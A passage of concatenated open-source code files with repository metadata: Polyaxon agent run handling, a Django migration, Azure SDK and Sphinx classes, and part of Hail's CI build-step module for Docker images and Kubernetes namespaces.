timeout = self.sleep_interval or get_wait(index)
logger.info("Sleeping for {} seconds".format(timeout))
finally:
self.end()
def _check_status(self, agent_state):
if agent_state.status == V1Statuses.STOPPED:
print(
"Agent has been stopped from the platform,"
"but the deployment is still running."
"Please either set the agent to starting or teardown the agent deployment."
)
self.end(sleep=self.SLEEP_STOP_TIME)
elif agent_state.live_state < live_state.STATE_LIVE:
print(
"Agent has been archived from the platform,"
"but the deployment is still running."
"Please either restore the agent or teardown the agent deployment."
)
self.end(sleep=self.SLEEP_ARCHIVED_TIME)
def end(self, sleep: int = None):
self._graceful_shutdown = True
if sleep:
time.sleep(sleep)
else:
logger.info("Agent is shutting down.")
def process(self, pool: "ThreadPoolExecutor") -> polyaxon_sdk.V1AgentStateResponse:
try:
agent_state = self.get_state()
if agent_state.compatible_updates:
self.sync_compatible_updates(agent_state.compatible_updates)
if agent_state:
logger.info("Starting runs submission process.")
else:
logger.info("No state was found.")
return polyaxon_sdk.V1AgentStateResponse()
state = agent_state.state
for run_data in state.schedules or []:
pool.submit(self.submit_run, run_data)
for run_data in state.queued or []:
pool.submit(self.submit_run, run_data)
for run_data in state.checks or []:
pool.submit(self.check_run, run_data)
for run_data in state.stopping or []:
pool.submit(self.stop_run, run_data)
for run_data in state.apply or []:
pool.submit(self.apply_run, run_data)
for run_data in state.deleting or []:
pool.submit(self.delete_run, run_data)
for run_data in state.hooks or []:
pool.submit(self.make_and_create_run, run_data)
for run_data in state.watchdogs or []:
pool.submit(self.make_and_create_run, run_data)
for run_data in state.tuners or []:
pool.submit(self.make_and_create_run, run_data, True)
return agent_state
except Exception as exc:
logger.error(exc)
return polyaxon_sdk.V1AgentStateResponse()
def log_run_failed(
self,
run_owner: str,
run_project: str,
run_uuid: str,
exc: Exception,
message: str = None,
) -> None:
message = message or "Agent failed deploying run.\n"
message += "error: {}\n{}".format(repr(exc), traceback.format_exc())
self.log_run_status(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
status=V1Statuses.FAILED,
reason="AgentLogger",
message=message,
)
logger.warning(message)
def log_run_stopped(self, run_owner: str, run_project: str, run_uuid: str) -> None:
message = "Run was not found. The agent assumed it was already stopped."
self.log_run_status(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
status=V1Statuses.STOPPED,
reason="AgentLogger",
message=message,
)
logger.warning(message)
def log_run_scheduled(
self, run_owner: str, run_project: str, run_uuid: str
) -> None:
message = "Run was scheduled by the agent."
self.log_run_status(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
status=V1Statuses.SCHEDULED,
reason="AgentLogger",
message=message,
)
logger.info(message)
def log_run_running(self, run_owner: str, run_project: str, run_uuid: str) -> None:
message = "Run changes were applied by the agent."
self.log_run_status(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
status=V1Statuses.RUNNING,
reason="AgentLogger",
message=message,
)
logger.info(message)
def log_run_status(
self,
run_owner: str,
run_project: str,
run_uuid: str,
status: str,
reason: str = None,
message: str = None,
):
status_condition = V1StatusCondition.get_condition(
type=status, status=True, reason=reason, message=message
)
self.client.runs_v1.create_run_status(
owner=run_owner,
project=run_project,
uuid=run_uuid,
body={"condition": status_condition},
async_req=True,
)
def clean_run(self, run_uuid: str, run_kind: str):
try:
self.spawner.clean(run_uuid=run_uuid, run_kind=run_kind)
self.spawner.stop(run_uuid=run_uuid, run_kind=run_kind)
except ApiException as e:
if e.status == 404:
logger.info("Run does not exist.")
except Exception as e:
logger.info(
"Run could not be cleaned: {}\n{}".format(
repr(e), traceback.format_exc()
)
)
def make_run_resource(
self,
owner_name: str,
project_name: str,
run_name: str,
run_uuid: str,
content: str,
default_auth=False,
) -> Dict:
try:
return converter.make_and_convert(
owner_name=owner_name,
project_name=project_name,
run_name=run_name,
run_uuid=run_uuid,
content=content,
default_auth=default_auth,
)
except PolypodException as e:
logger.info(
"Run could not be cleaned. Agent failed converting run manifest: {}\n{}".format(
repr(e), traceback.format_exc()
)
)
except Exception as e:
logger.info(
"Agent failed during compilation with unknown exception: {}\n{}".format(
repr(e), traceback.format_exc()
)
)
def prepare_run_resource(
self,
owner_name: str,
project_name: str,
run_name: str,
run_uuid: str,
content: str,
) -> Dict:
try:
return converter.convert(
owner_name=owner_name,
project_name=project_name,
run_name=run_name,
run_uuid=run_uuid,
content=content,
default_auth=True,
agent_content=self.content,
)
except PolypodException as e:
self.log_run_failed(
run_owner=owner_name,
run_project=project_name,
run_uuid=run_uuid,
exc=e,
message="Agent failed converting run manifest.\n",
)
except Exception as e:
self.log_run_failed(
run_owner=owner_name,
run_project=project_name,
run_uuid=run_uuid,
exc=e,
message="Agent failed during compilation with unknown exception.\n",
)
def submit_run(self, run_data: Tuple[str, str, str, str]):
run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
resource = self.prepare_run_resource(
owner_name=run_owner,
project_name=run_project,
run_name=run_data[2],
run_uuid=run_uuid,
content=run_data[3],
)
if not resource:
return
try:
self.spawner.create(
run_uuid=run_uuid, run_kind=run_data[1], resource=resource
)
except ApiException as e:
if e.status == 409:
logger.info("Run already running, triggering an apply mechanism.")
self.apply_run(run_data=run_data)
else:
logger.info("Run submission error.")
self.log_run_failed(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
exc=e,
)
except Exception as e:
self.log_run_failed(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
exc=e,
)
def make_and_create_run(
self, run_data: Tuple[str, str, str, str], default_auth: bool = False
):
run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
resource = self.make_run_resource(
owner_name=run_owner,
project_name=run_project,
run_name=run_data[2],
run_uuid=run_uuid,
content=run_data[3],
default_auth=default_auth,
)
if not resource:
return
try:
self.spawner.create(
run_uuid=run_uuid, run_kind=run_data[1], resource=resource
)
except ApiException as e:
if e.status == 409:
logger.info("Run already running, triggering an apply mechanism.")
else:
logger.info("Run submission error.")
except Exception as e:
logger.info(
"Run could not be cleaned. Agent failed converting run manifest: {}\n{}".format(
repr(e), traceback.format_exc()
)
)
def apply_run(self, run_data: Tuple[str, str, str, str]):
run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
resource = self.prepare_run_resource(
owner_name=run_owner,
project_name=run_project,
run_name=run_data[2],
run_uuid=run_uuid,
content=run_data[3],
)
if not resource:
return
try:
self.spawner.apply(
run_uuid=run_uuid, run_kind=run_data[1], resource=resource
)
self.log_run_running(
run_owner=run_owner, run_project=run_project, run_uuid=run_uuid
)
except Exception as e:
self.log_run_failed(
run_owner=run_owner, run_project=run_project, run_uuid=run_uuid, exc=e
)
self.clean_run(run_uuid=run_uuid, run_kind=run_data[1])
def check_run(self, run_data: Tuple[str, str]):
run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
try:
self.spawner.get(run_uuid=run_uuid, run_kind=run_data[1])
except ApiException as e:
if e.status == 404:
logger.info(
"Run does not exist anymore, it could have been stopped or deleted."
)
self.log_run_stopped(
run_owner=run_owner, run_project=run_project, run_uuid=run_uuid
)
def stop_run(self, run_data: Tuple[str, str]):
run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
try:
self.spawner.stop(run_uuid=run_uuid, run_kind=run_data[1])
except ApiException as e:
if e.status == 404:
logger.info("Run does not exist anymore, it could have been stopped.")
self.log_run_stopped(
run_owner=run_owner, run_project=run_project, run_uuid=run_uuid
)
except Exception as e:
self.log_run_failed(
run_owner=run_owner,
run_project=run_project,
run_uuid=run_uuid,
exc=e,
message="Agent failed stopping run.\n",
)
def delete_run(self, run_data: Tuple[str, str, str, str]):
run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
self.clean_run(run_uuid=run_uuid, run_kind=run_data[1])
if run_data[3]:
self.make_and_create_run(run_data)
| {
"content_hash": "1aa0a74990e9242ea5fe7de94637ebd3",
"timestamp": "",
"source": "github",
"line_count": 443,
"max_line_length": 96,
"avg_line_length": 35.73363431151242,
"alnum_prop": 0.5416929879974731,
"repo_name": "polyaxon/polyaxon",
"id": "f921f93ca09b291fde3af9053deab034cfca2921",
"size": "16434",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/polyaxon/agents/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1989"
},
{
"name": "Python",
"bytes": "5201898"
},
{
"name": "Shell",
"bytes": "1565"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fundraising', '0007_auto_20150119_1335'),
('fundraising', '0003_auto_20150119_1842'),
]
operations = [
]
| {
"content_hash": "f3142e8318073153e96b70d3802c02a3",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 51,
"avg_line_length": 20.071428571428573,
"alnum_prop": 0.6476868327402135,
"repo_name": "gnarf/djangoproject.com",
"id": "6dd56ff629527f701c4bb8c67611ac1f0cfa60d3",
"size": "305",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "fundraising/migrations/0008_merge.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "133070"
},
{
"name": "CoffeeScript",
"bytes": "24188"
},
{
"name": "HTML",
"bytes": "216623"
},
{
"name": "JavaScript",
"bytes": "802988"
},
{
"name": "Makefile",
"bytes": "1628"
},
{
"name": "Python",
"bytes": "499515"
},
{
"name": "Ruby",
"bytes": "19821"
},
{
"name": "Smalltalk",
"bytes": "1917"
}
],
"symlink_target": ""
} |
import cv2
import sys
name = "upload/IB_answer_sheet7.png"
image = cv2.imread(name)
f = open("answer.txt")
answer = f.read()
temp = "%s" %"1"
print(temp)
sys.exit()
print(answer) | {
"content_hash": "c52ec72930ad16e84917d420ed4c491c",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 36,
"avg_line_length": 13.071428571428571,
"alnum_prop": 0.6612021857923497,
"repo_name": "Hubert51/AutoGrading",
"id": "6d6660c9c0d5bed1de05d25f7eed4280ce61a42c",
"size": "183",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Web/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1232"
},
{
"name": "C",
"bytes": "400177"
},
{
"name": "C++",
"bytes": "197133"
},
{
"name": "CMake",
"bytes": "14482"
},
{
"name": "CSS",
"bytes": "10474"
},
{
"name": "HTML",
"bytes": "31429"
},
{
"name": "JavaScript",
"bytes": "6748"
},
{
"name": "Makefile",
"bytes": "13303"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "5716801"
},
{
"name": "Tcl",
"bytes": "1295070"
}
],
"symlink_target": ""
} |
from msrest.paging import Paged
class SnapshotPaged(Paged):
"""
A paging container for iterating over a list of :class:`Snapshot <azure.mgmt.compute.v2016_04_30_preview.models.Snapshot>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[Snapshot]'}
}
def __init__(self, *args, **kwargs):
super(SnapshotPaged, self).__init__(*args, **kwargs)
| {
"content_hash": "3d2fad4bc2a85e055b299406b6e2c4b7",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 133,
"avg_line_length": 29.125,
"alnum_prop": 0.6008583690987125,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "0d2d8bc3af20aed494e88e38aeb059672559cb47",
"size": "940",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/snapshot_paged.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
"""
sphinx.directives
~~~~~~~~~~~~~~~~~
Handlers for additional ReST directives.
:copyright: Copyright 2007-2014 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from docutils.parsers.rst import Directive, directives
from sphinx import addnodes
from sphinx.util.docfields import DocFieldTransformer
# import and register directives
from sphinx.directives.code import *
from sphinx.directives.other import *
# RE to strip backslash escapes
nl_escape_re = re.compile(r'\\\n')
strip_backslash_re = re.compile(r'\\(.)')
class ObjectDescription(Directive):
"""
Directive to describe a class, function or similar object. Not used
directly, but subclassed (in domain-specific directives) to add custom
behavior.
"""
has_content = True
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {
'noindex': directives.flag,
}
# types of doc fields that this directive handles, see sphinx.util.docfields
doc_field_types = []
def get_signatures(self):
"""
Retrieve the signatures to document from the directive arguments. By
default, signatures are given as arguments, one per line.
Backslash-escaping of newlines is supported.
"""
lines = nl_escape_re.sub('', self.arguments[0]).split('\n')
# remove backslashes to support (dummy) escapes; helps Vim highlighting
return [strip_backslash_re.sub(r'\1', line.strip()) for line in lines]
def handle_signature(self, sig, signode):
"""
Parse the signature *sig* into individual nodes and append them to
*signode*. If ValueError is raised, parsing is aborted and the whole
*sig* is put into a single desc_name node.
The return value should be a value that identifies the object. It is
passed to :meth:`add_target_and_index()` unchanged, and otherwise only
used to skip duplicates.
"""
raise ValueError
def add_target_and_index(self, name, sig, signode):
"""
Add cross-reference IDs and entries to self.indexnode, if applicable.
*name* is whatever :meth:`handle_signature()` returned.
"""
return # do nothing by default
def before_content(self):
"""
Called before parsing content. Used to set information about the current
directive context on the build environment.
"""
pass
def after_content(self):
"""
Called after parsing content. Used to reset information about the
current directive context on the build environment.
"""
pass
def run(self):
"""
Main directive entry function, called by docutils upon encountering the
directive.
This directive is meant to be quite easily subclassable, so it delegates
to several additional methods. What it does:
* find out if called as a domain-specific directive, set self.domain
* create a `desc` node to fit all description inside
* parse standard options, currently `noindex`
* create an index node if needed as self.indexnode
* parse all given signatures (as returned by self.get_signatures())
using self.handle_signature(), which should either return a name
or raise ValueError
* add index entries using self.add_target_and_index()
* parse the content and handle doc fields in it
"""
if ':' in self.name:
self.domain, self.objtype = self.name.split(':', 1)
else:
self.domain, self.objtype = '', self.name
self.env = self.state.document.settings.env
self.indexnode = addnodes.index(entries=[])
node = addnodes.desc()
node.document = self.state.document
node['domain'] = self.domain
# 'desctype' is a backwards compatible attribute
node['objtype'] = node['desctype'] = self.objtype
node['noindex'] = noindex = ('noindex' in self.options)
self.names = []
signatures = self.get_signatures()
for i, sig in enumerate(signatures):
# add a signature node for each signature in the current unit
# and add a reference target for it
signode = addnodes.desc_signature(sig, '')
signode['first'] = False
node.append(signode)
try:
# name can also be a tuple, e.g. (classname, objname);
# this is strictly domain-specific (i.e. no assumptions may
# be made in this base class)
name = self.handle_signature(sig, signode)
except ValueError:
# signature parsing failed
signode.clear()
signode += addnodes.desc_name(sig, sig)
continue # we don't want an index entry here
if name not in self.names:
self.names.append(name)
if not noindex:
# only add target and index entry if this is the first
# description of the object with this name in this desc block
self.add_target_and_index(name, sig, signode)
contentnode = addnodes.desc_content()
node.append(contentnode)
if self.names:
# needed for association of version{added,changed} directives
self.env.temp_data['object'] = self.names[0]
self.before_content()
self.state.nested_parse(self.content, self.content_offset, contentnode)
DocFieldTransformer(self).transform_all(contentnode)
self.env.temp_data['object'] = None
self.after_content()
return [self.indexnode, node]
# backwards compatible old name
DescDirective = ObjectDescription
class DefaultDomain(Directive):
"""
Directive to (re-)set the default domain for this source file.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = False
option_spec = {}
def run(self):
env = self.state.document.settings.env
domain_name = self.arguments[0].lower()
# if domain_name not in env.domains:
# # try searching by label
# for domain in env.domains.itervalues():
# if domain.label.lower() == domain_name:
# domain_name = domain.name
# break
env.temp_data['default_domain'] = env.domains.get(domain_name)
return []
directives.register_directive('default-domain', DefaultDomain)
directives.register_directive('describe', ObjectDescription)
# new, more consistent, name
directives.register_directive('object', ObjectDescription)
| {
"content_hash": "c85118f02b8b99d85e1540638de003ac",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 81,
"avg_line_length": 35.70680628272251,
"alnum_prop": 0.625366568914956,
"repo_name": "analurandis/Tur",
"id": "250a013e96b5b3330a9f3cb417aafe67fbebb50b",
"size": "6844",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "backend/venv/Lib/site-packages/sphinx/directives/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "2277"
},
{
"name": "C",
"bytes": "433673"
},
{
"name": "C++",
"bytes": "21783"
},
{
"name": "CSS",
"bytes": "84779"
},
{
"name": "HTML",
"bytes": "340406"
},
{
"name": "JavaScript",
"bytes": "311663"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "14466829"
},
{
"name": "Shell",
"bytes": "3059"
},
{
"name": "TeX",
"bytes": "56837"
}
],
"symlink_target": ""
} |
import abc
import os.path
import json
import logging
from collections import defaultdict, Counter
from shlex import quote as shq
import yaml
import jinja2
from hailtop.utils import RETRY_FUNCTION_SCRIPT, flatten
from .utils import generate_token
from .environment import GCP_PROJECT, GCP_ZONE, DOMAIN, IP, CI_UTILS_IMAGE, \
DEFAULT_NAMESPACE, BATCH_PODS_NAMESPACE, KUBERNETES_SERVER_URL, BUCKET
from .globals import is_test_deployment
log = logging.getLogger('ci')
pretty_print_log = "jq -Rr '. as $raw | try \
(fromjson | if .hail_log == 1 then \
([.levelname, .asctime, .filename, .funcNameAndLine, .message, .exc_info] | @tsv) \
else $raw end) \
catch $raw'"
def expand_value_from(value, config):
if isinstance(value, str):
return value
assert isinstance(value, dict)
path = value['valueFrom']
path = path.split('.')
v = config
for field in path:
v = v[field]
return v
def get_namespace(value, config):
assert isinstance(value, dict)
path = value['valueFrom'].split('.')
assert len(path) == 2
assert path[1] == 'name'
v = config[path[0]]
assert v['kind'] == 'createNamespace'
return v['name']
class Code(abc.ABC):
@abc.abstractmethod
def short_str(self):
pass
@abc.abstractmethod
def config(self):
pass
@abc.abstractmethod
def repo_dir(self):
"""Path to repository on the ci (locally)."""
@abc.abstractmethod
def checkout_script(self):
"""Bash script to checkout out the code in the current directory."""
class StepParameters:
def __init__(self, code, scope, json, name_step):
self.code = code
self.scope = scope
self.json = json
self.name_step = name_step
class BuildConfigurationError(Exception):
pass
class BuildConfiguration:
def __init__(self, code, config_str, scope, requested_step_names=()):
config = yaml.safe_load(config_str)
name_step = {}
self.steps = []
if requested_step_names:
log.info(f"Constructing build configuration with steps: {requested_step_names}")
for step_config in config['steps']:
step_params = StepParameters(code, scope, step_config, name_step)
step = Step.from_json(step_params)
if not step.run_if_requested or step.name in requested_step_names:
self.steps.append(step)
name_step[step.name] = step
else:
name_step[step.name] = None
# transitively close requested_step_names over dependencies
if requested_step_names:
visited = set()
def request(step):
if step not in visited:
visited.add(step)
for s2 in step.deps:
request(s2)
for step_name in requested_step_names:
request(name_step[step_name])
self.steps = [s for s in self.steps if s in visited]
def build(self, batch, code, scope):
assert scope in ('deploy', 'test', 'dev')
for step in self.steps:
if step.scopes is None or scope in step.scopes:
step.build(batch, code, scope)
if scope == 'dev':
return
step_to_parent_steps = defaultdict(set)
for step in self.steps:
for dep in step.all_deps():
step_to_parent_steps[dep].add(step)
for step in self.steps:
parent_jobs = flatten([parent_step.wrapped_job() for parent_step in step_to_parent_steps[step]])
log.info(f"Cleanup {step.name} after running {[parent_step.name for parent_step in step_to_parent_steps[step]]}")
if step.scopes is None or scope in step.scopes:
step.cleanup(batch, scope, parent_jobs)
class Step(abc.ABC):
def __init__(self, params):
json = params.json
self.name = json['name']
if 'dependsOn' in json:
duplicates = [
name
for name, count in Counter(json['dependsOn']).items()
if count > 1]
if duplicates:
raise BuildConfigurationError(f'found duplicate dependencies of {self.name}: {duplicates}')
self.deps = [params.name_step[d] for d in json['dependsOn'] if params.name_step[d]]
else:
self.deps = []
self.scopes = json.get('scopes')
self.run_if_requested = json.get('runIfRequested', False)
self.token = generate_token()
def input_config(self, code, scope):
config = {}
config['global'] = {
'project': GCP_PROJECT,
'zone': GCP_ZONE,
'domain': DOMAIN,
'ip': IP,
'k8s_server_url': KUBERNETES_SERVER_URL
}
config['token'] = self.token
config['deploy'] = scope == 'deploy'
config['scope'] = scope
config['code'] = code.config()
if self.deps:
for d in self.deps:
config[d.name] = d.config(scope)
return config
def deps_parents(self):
if not self.deps:
return None
return flatten([d.wrapped_job() for d in self.deps])
def all_deps(self):
visited = set([self])
frontier = [self]
while frontier:
current = frontier.pop()
for d in current.deps:
if d not in visited:
visited.add(d)
frontier.append(d)
return visited
@staticmethod
def from_json(params):
kind = params.json['kind']
if kind == 'buildImage':
return BuildImageStep.from_json(params)
if kind == 'runImage':
return RunImageStep.from_json(params)
if kind == 'createNamespace':
return CreateNamespaceStep.from_json(params)
if kind == 'deploy':
return DeployStep.from_json(params)
if kind in ('createDatabase', 'createDatabase2'):
return CreateDatabaseStep.from_json(params)
raise BuildConfigurationError(f'unknown build step kind: {kind}')
def __eq__(self, other):
return isinstance(other, self.__class__) and self.name == other.name
def __hash__(self):
return hash(self.name)
@abc.abstractmethod
def build(self, batch, code, scope):
pass
@abc.abstractmethod
def cleanup(self, batch, scope, parents):
pass
class BuildImageStep(Step):
def __init__(self, params, dockerfile, context_path, publish_as, inputs): # pylint: disable=unused-argument
super().__init__(params)
self.dockerfile = dockerfile
self.context_path = context_path
self.publish_as = publish_as
self.inputs = inputs
if params.scope == 'deploy' and publish_as and not is_test_deployment:
self.base_image = f'gcr.io/{GCP_PROJECT}/{self.publish_as}'
else:
self.base_image = f'gcr.io/{GCP_PROJECT}/ci-intermediate'
self.image = f'{self.base_image}:{self.token}'
self.job = None
def wrapped_job(self):
if self.job:
return [self.job]
return []
@staticmethod
def from_json(params):
json = params.json
return BuildImageStep(params,
json['dockerFile'],
json.get('contextPath'),
json.get('publishAs'),
json.get('inputs'))
def config(self, scope): # pylint: disable=unused-argument
return {
'token': self.token,
'image': self.image
}
def build(self, batch, code, scope):
if self.inputs:
input_files = []
for i in self.inputs:
input_files.append((f'gs://{BUCKET}/build/{batch.attributes["token"]}{i["from"]}', f'/io/{os.path.basename(i["to"])}'))
else:
input_files = None
config = self.input_config(code, scope)
if self.context_path:
context = f'repo/{self.context_path}'
init_context = ''
else:
context = 'context'
init_context = 'mkdir context'
rendered_dockerfile = 'Dockerfile'
if isinstance(self.dockerfile, dict):
assert ['inline'] == list(self.dockerfile.keys())
render_dockerfile = f'echo {shq(self.dockerfile["inline"])} > Dockerfile.{self.token};\n'
unrendered_dockerfile = f'Dockerfile.{self.token}'
else:
assert isinstance(self.dockerfile, str)
render_dockerfile = ''
unrendered_dockerfile = f'repo/{self.dockerfile}'
render_dockerfile += (f'python3 jinja2_render.py {shq(json.dumps(config))} '
f'{shq(unrendered_dockerfile)} {shq(rendered_dockerfile)}')
if self.publish_as:
published_latest = shq(f'gcr.io/{GCP_PROJECT}/{self.publish_as}:latest')
pull_published_latest = f'retry docker pull {shq(published_latest)} || true'
cache_from_published_latest = f'--cache-from {shq(published_latest)}'
else:
pull_published_latest = ''
cache_from_published_latest = ''
push_image = f'''
time retry docker push {self.image}
'''
if scope == 'deploy' and self.publish_as and not is_test_deployment:
push_image = f'''
docker tag {shq(self.image)} {self.base_image}:latest
retry docker push {self.base_image}:latest
''' + push_image
copy_inputs = ''
if self.inputs:
for i in self.inputs:
# to is relative to docker context
copy_inputs = copy_inputs + f'''
mkdir -p {shq(os.path.dirname(f'{context}{i["to"]}'))}
cp {shq(f'/io/{os.path.basename(i["to"])}')} {shq(f'{context}{i["to"]}')}
'''
script = f'''
set -ex
date
{ RETRY_FUNCTION_SCRIPT }
rm -rf repo
mkdir repo
(cd repo; {code.checkout_script()})
{render_dockerfile}
{init_context}
{copy_inputs}
FROM_IMAGE=$(awk '$1 == "FROM" {{ print $2; exit }}' {shq(rendered_dockerfile)})
gcloud -q auth activate-service-account \
--key-file=/secrets/gcr-push-service-account-key/gcr-push-service-account-key.json
gcloud -q auth configure-docker
retry docker pull $FROM_IMAGE
{pull_published_latest}
CPU_PERIOD=100000
CPU_QUOTA=$(( $(grep -c ^processor /proc/cpuinfo) * $(cat /sys/fs/cgroup/cpu/cpu.shares) * $CPU_PERIOD / 1024 ))
MEMORY=$(cat /sys/fs/cgroup/memory/memory.limit_in_bytes)
docker build --memory="$MEMORY" --cpu-period="$CPU_PERIOD" --cpu-quota="$CPU_QUOTA" -t {shq(self.image)} \
-f {rendered_dockerfile} \
--cache-from $FROM_IMAGE {cache_from_published_latest} \
{context}
{push_image}
date
'''
log.info(f'step {self.name}, script:\n{script}')
self.job = batch.create_job(CI_UTILS_IMAGE,
command=['bash', '-c', script],
mount_docker_socket=True,
secrets=[{
'namespace': BATCH_PODS_NAMESPACE,
'name': 'gcr-push-service-account-key',
'mount_path': '/secrets/gcr-push-service-account-key'
}],
attributes={'name': self.name},
input_files=input_files,
parents=self.deps_parents())
def cleanup(self, batch, scope, parents):
if scope == 'deploy' and self.publish_as and not is_test_deployment:
return
script = f'''
set -x
date
gcloud -q auth activate-service-account \
--key-file=/secrets/gcr-push-service-account-key/gcr-push-service-account-key.json
until gcloud -q container images untag {shq(self.image)} || ! gcloud -q container images describe {shq(self.image)}
do
echo 'failed, will sleep 2 and retry'
sleep 2
done
date
true
'''
self.job = batch.create_job(CI_UTILS_IMAGE,
command=['bash', '-c', script],
attributes={'name': f'cleanup_{self.name}'},
secrets=[{
'namespace': BATCH_PODS_NAMESPACE,
'name': 'gcr-push-service-account-key',
'mount_path': '/secrets/gcr-push-service-account-key'
}],
parents=parents,
always_run=True,
network='private')
class RunImageStep(Step):
def __init__(self, params, image, script, inputs, outputs, port, resources, service_account, secrets, always_run, timeout): # pylint: disable=unused-argument
super().__init__(params)
self.image = expand_value_from(image, self.input_config(params.code, params.scope))
self.script = script
self.inputs = inputs
self.outputs = outputs
self.port = port
self.resources = resources
if service_account:
self.service_account = {
'name': service_account['name'],
'namespace': get_namespace(service_account['namespace'], self.input_config(params.code, params.scope))
}
else:
self.service_account = None
self.secrets = secrets
self.always_run = always_run
self.timeout = timeout
self.job = None
def wrapped_job(self):
if self.job:
return [self.job]
return []
@staticmethod
def from_json(params):
json = params.json
return RunImageStep(params,
json['image'],
json['script'],
json.get('inputs'),
json.get('outputs'),
json.get('port'),
json.get('resources'),
json.get('serviceAccount'),
json.get('secrets'),
json.get('alwaysRun', False),
json.get('timeout', 3600))
def config(self, scope): # pylint: disable=unused-argument
return {
'token': self.token
}
def build(self, batch, code, scope):
template = jinja2.Template(self.script, undefined=jinja2.StrictUndefined, trim_blocks=True, lstrip_blocks=True)
rendered_script = template.render(**self.input_config(code, scope))
log.info(f'step {self.name}, rendered script:\n{rendered_script}')
if self.inputs:
input_files = []
for i in self.inputs:
input_files.append((f'gs://{BUCKET}/build/{batch.attributes["token"]}{i["from"]}', i["to"]))
else:
input_files = None
if self.outputs:
output_files = []
for o in self.outputs:
output_files.append((o["from"], f'gs://{BUCKET}/build/{batch.attributes["token"]}{o["to"]}'))
else:
output_files = None
secrets = []
if self.secrets:
for secret in self.secrets:
namespace = get_namespace(secret['namespace'], self.input_config(code, scope))
name = expand_value_from(secret['name'], self.input_config(code, scope))
mount_path = secret['mountPath']
secrets.append({
'namespace': namespace,
'name': name,
'mount_path': mount_path
})
self.job = batch.create_job(
self.image,
command=['bash', '-c', rendered_script],
port=self.port,
resources=self.resources,
attributes={'name': self.name},
input_files=input_files,
output_files=output_files,
secrets=secrets,
service_account=self.service_account,
parents=self.deps_parents(),
always_run=self.always_run,
timeout=self.timeout,
network='private')
def cleanup(self, batch, scope, parents):
pass
class CreateNamespaceStep(Step):
def __init__(self, params, namespace_name, admin_service_account, public, secrets):
super().__init__(params)
self.namespace_name = namespace_name
if admin_service_account:
self.admin_service_account = {
'name': admin_service_account['name'],
'namespace': get_namespace(admin_service_account['namespace'], self.input_config(params.code, params.scope))
}
else:
self.admin_service_account = None
self.public = public
self.secrets = secrets
self.job = None
if is_test_deployment:
assert self.namespace_name in ('default', 'batch_pods'), self.namespace_name
if self.namespace_name == 'default':
self._name = DEFAULT_NAMESPACE
else:
self._name = BATCH_PODS_NAMESPACE
return
if params.scope == 'deploy':
self._name = namespace_name
elif params.scope == 'test':
self._name = f'{params.code.short_str()}-{namespace_name}-{self.token}'
elif params.scope == 'dev':
self._name = params.code.namespace
else:
raise BuildConfigurationError(f"{params.scope} is not a valid scope for creating namespace")
def wrapped_job(self):
if self.job:
return [self.job]
return []
@staticmethod
def from_json(params):
json = params.json
return CreateNamespaceStep(params,
json['namespaceName'],
json.get('adminServiceAccount'),
json.get('public', False),
json.get('secrets'))
def config(self, scope): # pylint: disable=unused-argument
return {
'token': self.token,
'kind': 'createNamespace',
'name': self._name
}
def build(self, batch, code, scope): # pylint: disable=unused-argument
if is_test_deployment:
return
config = ""
if scope in ['deploy', 'test']:
# FIXME label
config = config + f'''\
apiVersion: v1
kind: Namespace
metadata:
name: {self._name}
labels:
for: test
---
'''
config = config + f'''\
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: {self.namespace_name}-admin
namespace: {self._name}
rules:
- apiGroups: [""]
resources: ["*"]
verbs: ["*"]
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: admin
namespace: {self._name}
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: admin-{self.namespace_name}-admin-binding
namespace: {self._name}
subjects:
- kind: ServiceAccount
name: admin
namespace: {self._name}
roleRef:
kind: Role
name: {self.namespace_name}-admin
apiGroup: ""
'''
if self.admin_service_account:
admin_service_account_name = self.admin_service_account['name']
admin_service_account_namespace = self.admin_service_account['namespace']
config = config + f'''\
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
